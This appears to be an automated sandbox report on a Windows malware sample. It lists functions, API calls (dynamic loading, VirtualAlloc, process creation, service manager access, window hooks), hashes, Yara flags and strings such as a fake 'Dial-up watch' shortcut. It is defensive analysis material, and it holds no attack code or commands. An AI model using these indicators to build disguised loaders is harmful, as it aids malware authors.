String ID: +pCZ_@Yjqp0E^j<ns$gq!FR%9+pHDhKd(^xHhwDFa4NpFHL#5ah6^fLsO$.dll$.mdb$76567567$%^#$@%$GFSDZDAHxsf$8192$Connections$Dial-up watch$EDAWytyfghtyuGFASCZFSDSGSDGDSZC$Josefsson$Keeps an eye on the dial-up connections$SDASQFddefgshdSSSgfdtEghfIITFDSSSSS$Virtua$\Dial-up watch.lnk$kernel32.dll$lAlloc$l_E
API String ID: 3373098730-1518523355
Opcode ID: 5654d22ce2d4c17c3417717f518a6901d9dad7202a0b478aa85e50c2951b8442
Instruction ID: 4c438c1c8dd353153f84129de82d61fa0c4bc3a41b5224fbd4ec1f9a53ff1d4c
Opcode Fuzzy Hash: 5654d22ce2d4c17c3417717f518a6901d9dad7202a0b478aa85e50c2951b8442
Instruction Fuzzy Hash: B43208702083805AD314EF65D455BAFBBE4AFD5708F40092EF586532C2EBBD9909C76B

Function 02501030 Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02504054,02504040), ref: 02501047
GetProcAddress.KERNEL32(00000000), ref: 0250104E

Part of subcall function 02501B30: SetLastError.KERNEL32(0000000D,?,02501070,?,00000040), ref: 02501B3D

SetLastError.KERNEL32(000000C1), ref: 02501096

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 721125ddf38d5578d35dd32152e260eee7fd2f1716f94d99f034a605754cbbff
Instruction ID: 457c8d74afab8148b00ba627939fa2510c625e368ffaa09ae89f7eadaaea5a74
Opcode Fuzzy Hash: 721125ddf38d5578d35dd32152e260eee7fd2f1716f94d99f034a605754cbbff
Instruction Fuzzy Hash: 4AF1E8B4E01609EFDB04CF94C994BAEBBB1BF48304F108598E909AB391D734EA41CF95

Function 00697D60 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 219
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,000A8C00,0100754F,00000000,000A8C00,?,00989680,?,?,00000000), ref: 00697EE5

Strings

fX, xrefs: 00697D84
Ou, xrefs: 00697E2A
DR, xrefs: 00697D9C

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: DR$Ou$fX
API String ID: 823142352-261343277
Opcode ID: 29c68f26cd408bbea7f97c5f2399e8d20c346ecdc733d0c61cb4097da3044781
Instruction ID: 282ba816477342166ad1440ee44f76a38bc8d2dd43e048b288aa61eb32f11720
Opcode Fuzzy Hash: 29c68f26cd408bbea7f97c5f2399e8d20c346ecdc733d0c61cb4097da3044781
Instruction Fuzzy Hash: D2819D716083018FDB58DF68D84562FB6EAAFC8754F00092EF185D7B90EB74DE098B96

Function 006938B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00693AC4
FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00693B1B
FindClose.KERNELBASE(?), ref: 00693B55

Strings

., xrefs: 0069390D
*LO, xrefs: 00693AA6

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: *LO$.
API String ID: 3541575487-2132576683
Opcode ID: 69eb07643a0f60730c4994237b09d213821fd155e1c791f8bdf25a1a0580920f
Instruction ID: 8ffaa83ad63d4d8f7d60d2ee65b1c5dc0ca5c5fb6c8bac5d50fac03f2cb4a737
Opcode Fuzzy Hash: 69eb07643a0f60730c4994237b09d213821fd155e1c791f8bdf25a1a0580920f
Instruction Fuzzy Hash: 945103B17142208BCF64AB749945ABB72EF9F90B40F00482FF456C7B91EA35CF098792

Function 006980D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00698218

Strings

DR, xrefs: 00698108
m, xrefs: 00698100
Ou, xrefs: 00698190

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: DR$Ou$m
API String ID: 823142352-902897619
Opcode ID: bd23235fa47a764db455a7946dd971be5e7aa645352369120648d4646e097c39
Instruction ID: e8b6c39d324ef2261681351424f5f69b8dea1af1927efe04633d20e9c3a83b4c
Opcode Fuzzy Hash: bd23235fa47a764db455a7946dd971be5e7aa645352369120648d4646e097c39
Instruction Fuzzy Hash: 41619E316083019FDB58DF68C845A6FB6EAABD4714F00491DF49597790DBB8CE098BC6

Function 0044B3CB Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,?,?,0044B3C6), ref: 0044B442
GetProcessVersion.KERNELBASE(00000000,?,?,?,0044B3C6), ref: 0044B47F
LoadCursorA.USER32(00000000,00007F02), ref: 0044B4AD
LoadCursorA.USER32(00000000,00007F00), ref: 0044B4B8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 27059771b43d753aa87d0c8afb5767cf09eb86d94b91e0dc31e339111e6195d2
Instruction ID: 61447e28742b9c37f9121ee1e7ef2b18fb52499020237da44fe629e5fb2c2d4e
Opcode Fuzzy Hash: 27059771b43d753aa87d0c8afb5767cf09eb86d94b91e0dc31e339111e6195d2
Instruction Fuzzy Hash: 96118FB1A00B509FD728DF3A989452ABBE5FB887057104D3FE18BC6B91D7B8E400CB94

Function 00694F50 Relevance: 3.2, APIs: 2, Instructions: 249
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,006987E4,?,33A6B453,?,?), ref: 00695174
RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,006987E4,?,33A6B453,?,?), ref: 006952D3

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: d15866aeb07ca641a464a3c39c3b5ed44d54a87b10d9adddae008f4e036c2f89
Instruction ID: 9b6f5831e4ebf792bec78cefdb195fd44905c45026ef62d51e6e0cb09c60b4ae
Opcode Fuzzy Hash: d15866aeb07ca641a464a3c39c3b5ed44d54a87b10d9adddae008f4e036c2f89
Instruction Fuzzy Hash: 7581D231B003119BDF55AFB88CA5B7A72DFAFC4B40F44443AF906DBB90EA649E054785

Function 00403690 Relevance: 3.0, APIs: 2, Instructions: 25encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 004036A6
CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,00000000), ref: 004036BE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: ae964a5621c021bca1bb6aca4b94374461255d92e87fbcd9fbf60fdd5d79beda
Instruction ID: ef64d0737d2536e9529a5b78dacf7c0428e1e8eef94a167ca9e1c2f0ff5251fc
Opcode Fuzzy Hash: ae964a5621c021bca1bb6aca4b94374461255d92e87fbcd9fbf60fdd5d79beda
Instruction Fuzzy Hash: 68E012713E430578F534DA609C43F9612C95794F15F60451DB346ED1C0DBF5A148862A

Function 006941C0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000050), ref: 00694214

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 240d40f6681e6a4656b0af5d8d6b9c0bf8bc5fac8e4888924dfbde1cd0624073
Instruction ID: 895b93dc9c0850d522c393acb41a8592e77cfce72d28e2898710f0712262240a
Opcode Fuzzy Hash: 240d40f6681e6a4656b0af5d8d6b9c0bf8bc5fac8e4888924dfbde1cd0624073
Instruction Fuzzy Hash: B0E03921B402504BDF94ABB8A855D7F22AFAFC8A10744442BB004CBF50EE258D064BA1

Function 0044ADBB Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(0046D3A8,0046D1D0,00000000,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044ADCA
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE1F
GlobalHandle.KERNEL32(006B4C58), ref: 0044AE28
GlobalUnlock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE31
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0044AE43
GlobalHandle.KERNEL32(006B4C58), ref: 0044AE5A
GlobalLock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE61
LeaveCriticalSection.KERNEL32(0041AB45,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE67
GlobalLock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE76
LeaveCriticalSection.KERNEL32(?), ref: 0044AEBF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: a84cb7d6984c8d6d811a40fea39b0d0b602f93581ce9faa88f2f1d31b083148b
Instruction ID: bada2b594807bec06dbc502a2a2f514ce0bc9c65c8accb9ec4cd3993ec855e16
Opcode Fuzzy Hash: a84cb7d6984c8d6d811a40fea39b0d0b602f93581ce9faa88f2f1d31b083148b
Instruction Fuzzy Hash: FB31D2B12407059FE7209F28EC99A3BB7E9FF44305B00092EF866C3661E775E8148B15

Function 0043428A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0043429D
SetWindowsHookExA.USER32(000000FF,004345DF,00000000,00000000), ref: 004342AD

Part of subcall function 0044B1B7: __EH_prolog.LIBCMT ref: 0044B1BC

Strings

`k, xrefs: 004342B8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID: `k
API String ID: 2183259885-1538017259
Opcode ID: 70fb75fef07ce0378a57383cbd503d996d654f82368ffc9c67712eecc2d0be4b
Instruction ID: 42c4c9652d243a8e5e0f7fe85461ab7b302250681256a049a1242e2575c7fa57
Opcode Fuzzy Hash: 70fb75fef07ce0378a57383cbd503d996d654f82368ffc9c67712eecc2d0be4b
Instruction Fuzzy Hash: 99F02031D003006BFB303B74AC09BAA36509B44365F15025FF512AB1E2EF6CAC80C39E

Function 00695C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00695C4B

Strings

?*S, xrefs: 00695C38

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: ?*S
API String ID: 621844428-1645505001
Opcode ID: f231aed4cf462b3c444ebebbe26497c10e5964f375bc4047caac8836dea9ffdd
Instruction ID: af9aca6fce7446cb6c79491377b1b92ce973389c82957fe11a21f0843d6f83d9
Opcode Fuzzy Hash: f231aed4cf462b3c444ebebbe26497c10e5964f375bc4047caac8836dea9ffdd
Instruction Fuzzy Hash: D6D0C93070131087EB946FB59916B2A229F6BA0740F40542E750ACFB86DFA18D115354

Function 0041ED68 Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041ED90
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDC4
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDDE
HeapFree.KERNEL32(00000000,?,?,00000000,0041EB30,?,?,?,0000E0DF), ref: 0041EDF5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 299f3c4eb023eede72354afa9ffec15b36968518cba468086cb03dd7c672fd85
Instruction ID: 3917a33a731a4f26c8ddd7dc5ffd53177df06919f1deb2cddf1dc0f74a425bd6
Opcode Fuzzy Hash: 299f3c4eb023eede72354afa9ffec15b36968518cba468086cb03dd7c672fd85
Instruction Fuzzy Hash: 83114974200601EFC730CF59FC449A27BB6FB853147104939F692C61B2E7A0988ADF59

Function 0054002D Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,00540005), ref: 005400E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00540005), ref: 00540111

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: cb18d3ee8c92ed13d9f56b0c98f69eaa114a5edd91263136774defe94d1276b2
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: E0D1C3716043068FDB14CF69C8847AABBE0FF9431CF24592DEA959B2C1E774E845CB91

Function 004063C0 Relevance: 4.6, APIs: 3, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405CF0: GetVersion.KERNEL32 ref: 00405CF3
Part of subcall function 00405CF0: GetVersionExA.KERNEL32(00000000), ref: 00405D32

SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0040BA54
GetCurrentThreadId.KERNEL32 ref: 0040BBB3
SetWindowsHookExA.USER32(00000004,0040C390,00000000,00000000), ref: 0040BBC3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Version$CurrentHookInfoParametersSystemThreadWindows
String ID:
API String ID: 72105273-0
Opcode ID: 1d7b24dff864bfbb398358bee1fd572c78d0ed037ffe63afc53e26ca092672fa
Instruction ID: 3c3346149ad313b162e0c066c67798ba01387fea516911bb939508601704bcdb
Opcode Fuzzy Hash: 1d7b24dff864bfbb398358bee1fd572c78d0ed037ffe63afc53e26ca092672fa
Instruction Fuzzy Hash: 8F414CB0B943043AFA1076715D4BF2A21A5CB40B09F60043FBA45FA5C2EEFDF85446AE

Function 00699530 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006997A0

Strings

y7@+, xrefs: 006997DF

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: y7@+
API String ID: 1889721586-1251112282
Opcode ID: a7aff30da6112158f0e575832ce0023577eb47e91df9ebbc12f23e7d49a8f19d
Instruction ID: 20e11015e55d23413c6eb86081f35b955946c5a5cf9ffc702bba48beccace59d
Opcode Fuzzy Hash: a7aff30da6112158f0e575832ce0023577eb47e91df9ebbc12f23e7d49a8f19d
Instruction Fuzzy Hash: BD717F706043019BDF58DF6C999977B72AFAB90B00F51082EF149DBB91EA30DD09C7A6

Function 00694A80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00694B01

Strings

D, xrefs: 00694AC0

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 35c86794a326ce4a4243e8fe389a71270d45ae655faaa702222ed144815fe730
Instruction ID: 934fb18b2b0144e722922dcbd01d1252c68187862c62f7b3db97f2fe4a691cdb
Opcode Fuzzy Hash: 35c86794a326ce4a4243e8fe389a71270d45ae655faaa702222ed144815fe730
Instruction Fuzzy Hash: 15219F30B103415BEB64AF689C11BAB739BAFC4B50F04042EB659CBB90EE75DD068399

Function 0044BF51 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0043685F,00000000,00000000,00000000,00000000,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000,0041AB45), ref: 0044BF5A
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000,0041AB45,00000000), ref: 0044BF61

Part of subcall function 0044BFB4: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044BFE5
Part of subcall function 0044BFB4: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044C086
Part of subcall function 0044BFB4: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044C0B3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID:
API String ID: 3389432936-0
Opcode ID: 0d9cdd44b9239cd40bc16e390169594cb2ecb7642703e43259d9f4463124c3c6
Instruction ID: 93c088ae3ad283a255a7ad2aba602553389a053c0a27788d3ab1f72d441cef74
Opcode Fuzzy Hash: 0d9cdd44b9239cd40bc16e390169594cb2ecb7642703e43259d9f4463124c3c6
Instruction Fuzzy Hash: DDF049749143118FEB14EF25D445A4A7BE8AF48714F15848FF4489B3A2CB78D844CFAA

Function 0041E68F Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0041AAC3,00000001), ref: 0041E6A0

Part of subcall function 0041E6CB: HeapAlloc.KERNEL32(00000000,00000140,0041E6B4), ref: 0041E6D8

HeapDestroy.KERNEL32 ref: 0041E6BE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 46416b415a1529b366a30996abd9f665a1de8c64c38805810ae3f64269dc9b8b
Instruction ID: a24c2dcacfa0da71c6b0bab1f0de9c476a85ba2cff2a23164a7b47a4eae0a3d2
Opcode Fuzzy Hash: 46416b415a1529b366a30996abd9f665a1de8c64c38805810ae3f64269dc9b8b
Instruction Fuzzy Hash: F1E012746113019AEB205B73BD097B636D49B54782F808876F845C91F1E7B4C580AF1A

Function 00693060 Relevance: 1.7, APIs: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006931CB

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
